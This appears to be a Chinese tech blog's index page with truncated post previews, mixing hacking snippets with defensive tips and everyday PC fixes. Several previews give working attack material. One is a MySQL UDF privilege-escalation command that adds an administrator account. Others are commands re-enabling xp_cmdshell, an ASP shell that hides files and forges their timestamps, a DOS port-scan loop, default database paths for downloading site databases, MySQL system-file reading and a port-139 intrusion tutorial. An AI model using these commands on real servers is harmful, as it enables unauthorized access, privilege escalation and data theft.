预览模式: 普通 | 列表

udf.dll提权代码

      C:\Winnt\udf.dll    2000
  C:\Windows\udf.dll 2003
  现在基本上win的服务器就这两个导出UDF.DLL
  create function cmdshell returns string soname 'udf.dll'
  select cmdshell('net user admins 226404553 /add');

查看更多...

分类:技术日记 | 固定链接 | 评论: 0 | 引用: 115 | 查看次数: 227

恢复执行xp_cmdshell

常见情况恢复执行xp_cmdshell.
  1 未能找到存储过程'master..xpcmdshell'.
  恢复方法:查询分离器连接后,
  第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
  第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'

查看更多...

分类:技术日记 | 固定链接 | 评论: 0 | 引用: 122 | 查看次数: 192

WIN2003最小权限分配批处理

保存为bat文件,执行!
  @echo off
  echo "虚拟主机C盘权限设定"
  echo "Author:an85.com"
  echo "删除C盘的everyone的权限"

查看更多...

分类:技术日记 | 固定链接 | 评论: 0 | 引用: 120 | 查看次数: 190

修改文件时间的ASP小程序源代码

<% 
'隐藏并修改文件的最后修改时间的aspshell 
'原理:通过FSO可以修改文件的属性,比如设置为只读,隐藏,系统等等;FSO中的attributes属性修改文件属性,1只读,2隐藏,4系统文件 
'     通过shell.application可以给文件重新设置一个最后修改时间 
'2009/02/24  write by skyfire 

查看更多...

分类:技术日记 | 固定链接 | 评论: 0 | 引用: 118 | 查看次数: 236

教你用DOS命令扫描网段端口

不需要任何工具,dos命令扫描一个网段的全部端口!
  在win2000下开一个dos窗口,然后执行
  for /l %a in (1,1,254) do start /min /low telnet 192.168.0.%a 3389
  这样192.168.0.x这个段的所有开放3389端口得主机都会暴露
  这条命令执行后

查看更多...

分类:技术日记 | 固定链接 | 评论: 0 | 引用: 121 | 查看次数: 184

网站安全之MSSQL安全设置

 
  前SQL INJECTION的攻击测试愈演愈烈,很多大型的网站和论坛都相继被注入。这些网站一般使用的多为SQL SERVER数据库,正因为如此,很多人开始怀疑SQL SERVER的安全性。其实SQL SERVER 2000已经通过了美国政府的C2级安全认证-这是该行业所能拥有的最高认证级别,所以使用SQL SERVER还是相当的安全的。当然和ORCAL、DB2等还是有差距,但是SQL SERVER的易用性和广泛性还是能成为我们继续使用下去的理由。那怎么样才能使SQL SERVER的设置让人使用的放心呢?
  第一步肯定是打上SQL SERVER最新的安全补丁.如果这一步都没有做好,那我们也没有继续下去的必要了。
  第 二步是修改默认的1433端口,并且将SQL SERVER隐藏。这样能禁止对试图枚举网络上现有的 SQL Server 客户端所发出的广播作出响应。另外,还需要在TCP/IP筛选中将1433端口屏蔽掉,尽可能的隐藏你的SQL SERVER数据库。这样子一但让攻击创建了SQL SERVER的账号,也不能马上使用查询分析器远程登陆来进行下一步的攻击。单从ASP,PHP等页面构造恶意语句的话,还有需要查看返回值的问题,总比 不上直接查询分析器来得利落。所以我们首先要做到即使让别人注入了,也不能让攻击者下一步做得顺当。修改方法:企业管理器 --> 你的数据库组 --> 属性 --> 常规 --> 网络配置 --> TCP/IP --> 属性 ,在这儿将你的默认端口进行修改,和SQL SERVER的隐藏。
  第三步是很重要的一步,SQL INJECTION往往在WEB CODE中产生。而做为系统管理员或者数据库管理员,总不能常常的去看每一段代码。即使常常看代码,也不能保证我们在上面的疏忽。那怎么办?我们就要从数 据库角色着手,让数据库用户的权限划分到最低点。SQL SERVER的默认权限让人真的很头疼,权限大得非常的高,权限小的又什么都做不了,SYSADMIN和db_owner真是让人又爱又恨。攻击者一但确 认了网站存在SQL INJECTION漏洞,肯定有一步操作步骤就是测试网站的SQL SERVER使用者具有多大的权限。一般都会借助Select IS_SRVROLEMEMBER('sysadmin'),或者Select IS_MEMBER('db_owner'),再或者用user = 0(让字符和数字进行比较,SQL SERVER就会提示了错误信息,从该信息中即可知道一些敏感信息)等语句进行测试。方法还有,我也不敢多说了。其一怕错,其二怕联盟中的人扁。在当前, 如果网站的数据库使用者用的是SA权限,再加上确认了WEB所处在的绝对路径,那么就宣告了你的网站的OVER。db_owner权限也一样,如果确认了 绝对路径,那么有50%的机会能给你的机器中上WEB 方式的木马,如海阳等。所以这儿我们确认了一点,我们必须要创建自已的权限,让攻击者找不着下嘴的地方。在这儿引用一个SQL SERVER联机帮助中的例子:

查看更多...

分类:技术日记 | 固定链接 | 评论: 0 | 引用: 128 | 查看次数: 181

各种网站数据库默认地址

 
  data/dvbbs7.mdb 动网论坛数据库
  /databackup/dvbbs7.mdb 动网论坛数据库
  /bbs/databackup/dvbbs7.mdb 动网论坛数据库
  /admin/data/qcdn_news.mdb 青创文章管理系统数据库

查看更多...

分类:技术日记 | 固定链接 | 评论: 0 | 引用: 126 | 查看次数: 1397

mysql下读取文件的几种方式

  在拥有file权限的前提下,读取文件为字符串形式插入表中,然后读出表中数据,只是方式略有不同
  mysql3.x下
  不确定mysql3.x下能否使用load_file()函数(我在mysql3使用手册上没有查到,但貌似是可以的),用 load data infile 读取文件,命令如下
  mysql>create table a (cmd text);
  mysql>load data infile 'c:\\boot.ini' into table a;

查看更多...

分类:技术日记 | 固定链接 | 评论: 0 | 引用: 121 | 查看次数: 223

139端口入侵教程

在线教程>139端口入侵
  很实用呀,大家有兴趣可以试试
  首先当然是扫一下网上开了139端口的机子了
  其实139端口也就是NetBIOS session端口 进行文件和打印共享的端口,你要先用
  NBTSTAT看一下NETBIOS的信息

查看更多...

分类:技术日记 | 固定链接 | 评论: 0 | 引用: 122 | 查看次数: 202

ASP实现防止网站被采集

 任何东西有利也有弊,转给需要的人。
  <%
  Dim AppealNum,AppealCount
  AppealNum=10 '同一IP60秒内请求限制10次
  AppealCount=Request.Cookies("AppealCount")

查看更多...

分类:技术日记 | 固定链接 | 评论: 0 | 引用: 129 | 查看次数: 210

七种DDoS攻击技术

  七种DDoS攻击技术方法简介
  DDOS攻击是现在最常见的一种黑客攻击方式,下面就给大家简单介绍一下DDOS的七种攻击方式.
  1.Synflood: 该攻击以多个随机的源主机地址向目的主机发送SYN包,而在收到目的主机的SYN ACK后并不回应,这样,目的主机就为这些源主机建立了大量的连接队列,而且由于没有收到ACK一直维护着这些队列,造成了资源的大量消耗而不能向正常请求提供服务。
  2.Smurf:该攻击向一个子网的广播地址发一个带有特定请求(如ICMP回应请求)的包,并且将源地址伪装成想要攻击的主机地址。子网上所有主机都回应广播包请求而向被攻击主机发包,使该主机受到攻击.
  3.Land-based:攻击者将一个包的源地址和目的地址都设置为目标主机的地址,然后将该包通过IP欺骗的方式发送给被攻击主机,这种包可以造成被攻击主机因试图与自己建立连接而陷入死循环,从而很大程度地降低了系统性能。

查看更多...

分类:技术日记 | 固定链接 | 评论: 0 | 引用: 132 | 查看次数: 211

一个小小的变动体现管理者的智慧

5.1长假第二天,我去电脑城买打印机墨水,结果刚要上电梯发现不对,明明是东边上西边下,结果今天相反,仔细想想,实在佩服这个管理人员,他为了让顾客多看一些柜台,将电梯反置.一些习惯性的客户肯定走了远路,而这样的一番周折恰恰是一个商机,客户多走几个柜台,他们就多几分机会,多多展示自己的产品!我在这里暗暗夸一句:"了不起"!

查看更多...

分类:技术日记 | 固定链接 | 评论: 0 | 引用: 123 | 查看次数: 287

防CC攻击asp代码

<%
'==================
'华夏黑客同盟防CC攻击ASP程序插件

'==================

查看更多...

分类:技术日记 | 固定链接 | 评论: 0 | 引用: 124 | 查看次数: 270

解决:无法识别的USB设备

现象一:插上USB设备后不停的在右下角任务栏弹出(无法识别的USB设备
原因:气候干燥,计算机容易积累静电导致莫名的计算机故障,严重的会致使硬件损坏。
处理方法:关机断点,拔掉主机上插的所有线(因为关机后主板还在加电)包括鼠标、键盘,等待1小时,自行恢复

现象二:插上U盘后,任务栏弹出无法识别的USB设备,关闭提示后U盘无法使用,但是USP鼠标或者其他设备可以使用。打开“设备管理器”的“通用串口总线控制器”发现有“unkown device”设备。

查看更多...

分类:技术日记 | 固定链接 | 评论: 0 | 引用: 126 | 查看次数: 372

无线网络加密方法

应用的是WEP加密协议:

无线路由上的WEP加密提供了“自动选择、开放系统和共享密匙”三种方式,为确保安全,建议选择“共享密匙”。下面设置密匙的长度,它提供了64位、128位和152位,密匙长度越长越安全。

修改客户端设置:

查看更多...

分类:技术日记 | 固定链接 | 评论: 0 | 引用: 125 | 查看次数: 276